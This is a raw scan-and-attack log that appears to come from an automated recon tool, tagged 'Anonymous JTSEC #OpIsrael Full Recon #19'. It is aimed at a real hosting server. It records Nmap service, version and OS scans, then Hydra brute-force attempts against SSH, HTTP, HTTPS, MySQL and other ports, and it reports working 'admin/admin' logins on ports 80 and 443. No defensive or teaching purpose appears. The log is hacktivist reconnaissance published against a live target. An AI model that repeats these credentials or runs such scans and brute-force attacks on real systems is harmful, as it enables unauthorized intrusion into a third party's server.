- 22/tcp open ssh OpenSSH 5.3 (protocol 2.0)
- | ssh-hostkey:
- | 1024 cc:18:eb:be:f1:bf:95:33:27:e7:9d:46:4b:f7:5e:51 (DSA)
- |_ 2048 02:20:0f:ee:ae:39:1e:aa:8c:36:e5:00:af:2f:43:ff (RSA)
- 23/tcp filtered telnet
- 53/tcp open domain?
- 80/tcp open http-proxy Squid http proxy
- | http-methods:
- |_ Supported Methods: GET HEAD POST OPTIONS
- |_http-open-proxy: Proxy might be redirecting requests
- |_http-title: Site doesn't have a title (text/html).
- 110/tcp open pop3 Dovecot pop3d
- |_pop3-capabilities: CAPA UIDL PIPELINING SASL(PLAIN LOGIN) USER TOP STLS AUTH-RESP-CODE RESP-CODES
- |_ssl-date: 2018-11-23T05:23:25+00:00; 0s from scanner time.
- 143/tcp open imap Dovecot imapd
- |_imap-capabilities: LITERAL+ listed ENABLE IDLE NAMESPACE LOGIN-REFERRALS Pre-login capabilities post-login ID SASL-IR have OK AUTH=LOGINA0001 AUTH=PLAIN more STARTTLS IMAP4rev1
- |_ssl-date: 2018-11-23T05:23:23+00:00; 0s from scanner time.
- 443/tcp open ssl/http nginx 1.14.0
- | http-methods:
- |_ Supported Methods: GET HEAD POST OPTIONS
- |_http-server-header: nginx/1.14.0
- |_http-title: Site doesn't have a title (text/html).
- | ssl-cert: Subject: commonName=*.myserverhosts.com
- | Subject Alternative Name: DNS:*.myserverhosts.com, DNS:myserverhosts.com
- | Issuer: commonName=COMODO RSA Domain Validation Secure Server CA/organizationName=COMODO CA Limited/stateOrProvinceName=Greater Manchester/countryName=GB
- | Public Key type: rsa
- | Public Key bits: 2048
- | Signature Algorithm: sha256WithRSAEncryption
- | Not valid before: 2018-06-08T00:00:00
- | Not valid after: 2020-06-08T23:59:59
- | MD5: d50b 913b c6d7 bcf1 bc54 97e6 d7d0 8e27
- |_SHA-1: 8930 1ed8 2100 fbd7 64e3 0901 b2f0 8d18 81e4 09c8
- |_ssl-date: 2018-11-23T05:23:18+00:00; 0s from scanner time.
- | tls-nextprotoneg:
- | h2
- |_ http/1.1
- 465/tcp open ssl/smtp Exim smtpd 4.91
- |_smtp-commands: Couldn't establish connection on port 465
- | ssl-cert: Subject: commonName=uscentral22.myserverhosts.com
- | Subject Alternative Name: DNS:uscentral22.myserverhosts.com, DNS:www.uscentral22.myserverhosts.com
- | Issuer: commonName=cPanel, Inc. Certification Authority/organizationName=cPanel, Inc./stateOrProvinceName=TX/countryName=US
- | Public Key type: rsa
- | Public Key bits: 2048
- | Signature Algorithm: sha256WithRSAEncryption
- | Not valid before: 2018-05-03T00:00:00
- | Not valid after: 2019-05-03T23:59:59
- | MD5: 9f53 7598 7aaa 4c71 27d6 9681 bf06 a492
- |_SHA-1: 6541 4f83 18e9 cf69 13af ee68 e216 d3ae 10c8 0254
- |_ssl-date: 2018-11-23T05:23:18+00:00; 0s from scanner time.
- 587/tcp open smtp Exim smtpd 4.91
- | smtp-commands: uscentral22.myserverhosts.com Hello nmap.scanme.org [185.244.213.149], SIZE 52428800, 8BITMIME, PIPELINING, AUTH PLAIN LOGIN, STARTTLS, HELP,
- |_ Commands supported: AUTH STARTTLS HELO EHLO MAIL RCPT DATA BDAT NOOP QUIT RSET HELP
- | ssl-cert: Subject: commonName=uscentral22.myserverhosts.com
- | Subject Alternative Name: DNS:uscentral22.myserverhosts.com, DNS:www.uscentral22.myserverhosts.com
- | Issuer: commonName=cPanel, Inc. Certification Authority/organizationName=cPanel, Inc./stateOrProvinceName=TX/countryName=US
- | Public Key type: rsa
- | Public Key bits: 2048
- | Signature Algorithm: sha256WithRSAEncryption
- | Not valid before: 2018-05-03T00:00:00
- | Not valid after: 2019-05-03T23:59:59
- | MD5: 9f53 7598 7aaa 4c71 27d6 9681 bf06 a492
- |_SHA-1: 6541 4f83 18e9 cf69 13af ee68 e216 d3ae 10c8 0254
- |_ssl-date: 2018-11-23T05:23:20+00:00; 0s from scanner time.
- 993/tcp open ssl/imaps?
- |_ssl-date: 2018-11-23T05:23:18+00:00; 0s from scanner time.
- 995/tcp open ssl/pop3s?
- |_ssl-date: 2018-11-23T05:23:18+00:00; 0s from scanner time.
- 3306/tcp open mysql MySQL 5.5.51-38.2
- | mysql-info:
- | Protocol: 10
- | Version: 5.5.51-38.2
- | Thread ID: 34070279
- | Capabilities flags: 63487
- | Some Capabilities: LongColumnFlag, Support41Auth, Speaks41ProtocolOld, Speaks41ProtocolNew, FoundRows, ConnectWithDatabase, IgnoreSpaceBeforeParenthesis, InteractiveClient, SupportsTransactions, IgnoreSigpipes, DontAllowDatabaseTableColumn, LongPassword, SupportsLoadDataLocal, ODBCClient, SupportsCompression, SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults
- | Status: Autocommit
- | Salt: fCYt__?Z)YfwC)BOFQC;
- |_ Auth Plugin Name: 84
- 7777/tcp filtered cbt
- 8080/tcp open http nginx 1.14.0
- | http-methods:
- |_ Supported Methods: GET HEAD POST OPTIONS
- |_http-server-header: nginx/1.14.0
- |_http-title: Site doesn't have a title (text/html).
- 8443/tcp open ssl/http nginx 1.14.0
- | http-methods:
- |_ Supported Methods: GET HEAD POST OPTIONS
- |_http-server-header: nginx/1.14.0
- |_http-title: Site doesn't have a title (text/html).
- | ssl-cert: Subject: commonName=*.myserverhosts.com
- | Subject Alternative Name: DNS:*.myserverhosts.com, DNS:myserverhosts.com
- | Issuer: commonName=COMODO RSA Domain Validation Secure Server CA/organizationName=COMODO CA Limited/stateOrProvinceName=Greater Manchester/countryName=GB
- | Public Key type: rsa
- | Public Key bits: 2048
- | Signature Algorithm: sha256WithRSAEncryption
- | Not valid before: 2018-06-08T00:00:00
- | Not valid after: 2020-06-08T23:59:59
- | MD5: d50b 913b c6d7 bcf1 bc54 97e6 d7d0 8e27
- |_SHA-1: 8930 1ed8 2100 fbd7 64e3 0901 b2f0 8d18 81e4 09c8
- |_ssl-date: 2018-11-23T05:23:23+00:00; 0s from scanner time.
- | tls-nextprotoneg:
- | h2
- |_ http/1.1
- 49152/tcp filtered unknown
- Device type: WAP|router|storage-misc
- Running: Linux 2.4.X|2.6.X, MikroTik RouterOS 5.X, Netgear RAIDiator 4.X
- OS CPE: cpe:/o:linux:linux_kernel:2.4.36 cpe:/o:mikrotik:routeros:5.25 cpe:/o:linux:linux_kernel:2.6.35 cpe:/o:netgear:raidiator:4.1.4
- OS details: DD-WRT v23 (Linux 2.4.36), MikroTik RouterOS 5.25 (Linux 2.6.35), Netgear ReadyNAS Duo NAS device (RAIDiator 4.1.4)
- Uptime guess: 301.013 days (since Fri Jan 26 00:07:11 2018)
- Network Distance: 2 hops
- Service Info: Host: uscentral22.myserverhosts.com
- TRACEROUTE (using port 25/tcp)
- HOP RTT ADDRESS
- 1 103.19 ms 10.251.200.1
- 2 103.15 ms 173.237.136.21
- NSE: Script Post-scanning.
- Initiating NSE at 00:25
- Completed NSE at 00:25, 0.00s elapsed
- Initiating NSE at 00:25
- Completed NSE at 00:25, 0.00s elapsed
- Read data files from: /usr/bin/../share/nmap
- OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 218.42 seconds
- Raw packets sent: 599 (28.512KB) | Rcvd: 556 (25.098KB)
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-23 00:25 EST
- NSE: Loaded 148 scripts for scanning.
- NSE: Script Pre-scanning.
- Initiating NSE at 00:25
- Completed NSE at 00:25, 0.00s elapsed
- Initiating NSE at 00:25
- Completed NSE at 00:25, 0.00s elapsed
- Initiating Parallel DNS resolution of 1 host. at 00:25
- Completed Parallel DNS resolution of 1 host. at 00:25, 16.50s elapsed
- Initiating UDP Scan at 00:25
- Scanning 173.237.136.21 [14 ports]
- Discovered open port 53/udp on 173.237.136.21
- Completed UDP Scan at 00:26, 6.57s elapsed (14 total ports)
- Initiating Service scan at 00:26
- Scanning 1 service on 173.237.136.21
- Completed Service scan at 00:26, 15.02s elapsed (1 service on 1 host)
- Initiating OS detection (try #1) against 173.237.136.21
- Retrying OS detection (try #2) against 173.237.136.21
- Initiating Traceroute at 00:26
- Completed Traceroute at 00:26, 7.16s elapsed
- Initiating Parallel DNS resolution of 1 host. at 00:26
- Completed Parallel DNS resolution of 1 host. at 00:26, 16.50s elapsed
- NSE: Script scanning 173.237.136.21.
- Initiating NSE at 00:26
- Completed NSE at 00:26, 0.45s elapsed
- Initiating NSE at 00:26
- Completed NSE at 00:26, 0.00s elapsed
- Nmap scan report for 173.237.136.21
- Host is up (0.21s latency).
- PORT STATE SERVICE VERSION
- 53/udp open domain (generic dns response: FORMERR)
- | fingerprint-strings:
- | NBTStat:
- |_ CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
- 67/udp closed dhcps
- 68/udp closed dhcpc
- 69/udp closed tftp
- 88/udp closed kerberos-sec
- 123/udp closed ntp
- 137/udp filtered netbios-ns
- 138/udp filtered netbios-dgm
- 139/udp closed netbios-ssn
- 161/udp closed snmp
- 162/udp closed snmptrap
- 389/udp closed ldap
- 520/udp closed route
- 2049/udp closed nfs
- 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
- Too many fingerprints match this host to give specific OS details
- Network Distance: 12 hops
- TRACEROUTE (using port 138/udp)
- HOP RTT ADDRESS
- 1 ... 2
- 3 102.71 ms 10.251.200.1
- 4 ... 5
- 6 104.13 ms 10.251.200.1
- 7 105.10 ms 10.251.200.1
- 8 105.09 ms 10.251.200.1
- 9 105.08 ms 10.251.200.1
- 10 105.05 ms 10.251.200.1
- 11 104.87 ms 10.251.200.1
- 12 104.87 ms 10.251.200.1
- 13 ... 18
- 19 103.61 ms 10.251.200.1
- 20 104.32 ms 10.251.200.1
- 21 103.29 ms 10.251.200.1
- 22 ... 29
- 30 104.00 ms 10.251.200.1
- NSE: Script Post-scanning.
- Initiating NSE at 00:26
- Completed NSE at 00:26, 0.00s elapsed
- Initiating NSE at 00:26
- Completed NSE at 00:26, 0.00s elapsed
- Read data files from: /usr/bin/../share/nmap
- OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 66.50 seconds
- Raw packets sent: 124 (5.705KB) | Rcvd: 91 (8.627KB)
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-23 00:26 EST
- Nmap scan report for 173.237.136.21
- Host is up (0.20s latency).
- Not shown: 16 closed ports, 1 filtered port
- Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
- PORT STATE SERVICE
- 21/tcp open ftp
- 22/tcp open ssh
- 53/tcp open domain
- 80/tcp open http
- 110/tcp open pop3
- 443/tcp open https
- 993/tcp open imaps
- 3306/tcp open mysql
- 8080/tcp open http-proxy
- #######################################################################################################################################
- 1 of 1 target completed, 0 valid passwords found
- Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-23 01:05:42
- + -- --=[Port 22 opened... running tests...
- Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
- Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-23 01:05:42
- [DATA] max 1 task per 1 server, overall 1 task, 363 login tries, ~363 tries per task
- [DATA] attacking ssh://173.237.136.21:22/
- Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
- Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-23 01:05:42
- [DATA] max 1 task per 1 server, overall 1 task, 1530 login tries (l:34/p:45), ~1530 tries per task
- [DATA] attacking ssh://173.237.136.21:22/
- + -- --=[Port 23 closed... skipping.
- + -- --=[Port 25 closed... skipping.
- + -- --=[Port 80 opened... running tests...
- Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
- Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-23 01:05:43
- [DATA] max 1 task per 1 server, overall 1 task, 1530 login tries (l:34/p:45), ~1530 tries per task
- [DATA] attacking http-get://173.237.136.21:80//
- [80][http-get] host: 173.237.136.21 login: admin password: admin
- [STATUS] attack finished for 173.237.136.21 (valid pair found)
- 1 of 1 target successfully completed, 1 valid password found
- Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-23 01:05:44
- + -- --=[Port 110 opened... running tests...
- Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
- + -- --=[Port 443 opened... running tests...
- Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
- Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-23 08:08:48
- [DATA] max 1 task per 1 server, overall 1 task, 1530 login tries (l:34/p:45), ~1530 tries per task
- [DATA] attacking http-gets://173.237.136.21:443//
- [443][http-get] host: 173.237.136.21 login: admin password: admin
- [STATUS] attack finished for 173.237.136.21 (valid pair found)
- 1 of 1 target successfully completed, 1 valid password found
- Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-23 08:08:49
- + -- --=[Port 445 closed... skipping.
- + -- --=[Port 512 closed... skipping.
- + -- --=[Port 513 closed... skipping.
- + -- --=[Port 514 closed... skipping.
- + -- --=[Port 993 opened... running tests...
- Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
- 1 of 1 target completed, 0 valid passwords found
- Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-23 15:59:55
- + -- --=[Port 1433 closed... skipping.
- + -- --=[Port 1521 closed... skipping.
- + -- --=[Port 3306 opened... running tests...
- Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
- Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-23 15:59:55
- [DATA] max 1 task per 1 server, overall 1 task, 78 login tries, ~78 tries per task
- [DATA] attacking mysql://173.237.136.21:3306/
- [STATUS] 50.00 tries/min, 50 tries in 00:01h, 28 to do in 00:01h, 1 active
- 1 of 1 target completed, 0 valid passwords found
- Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-23 16:00:55
- + -- --=[Port 3389 closed... skipping.
- + -- --=[Port 5432 closed... skipping.
- + -- --=[Port 5900 closed... skipping.
- + -- --=[Port 5901 closed... skipping.
- + -- --=[Port 8000 closed... skipping.
- + -- --=[Port 8080 opened... running tests...
- Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
- #######################################################################################################################################
- Anonymous JTSEC #OpIsrael Full Recon #19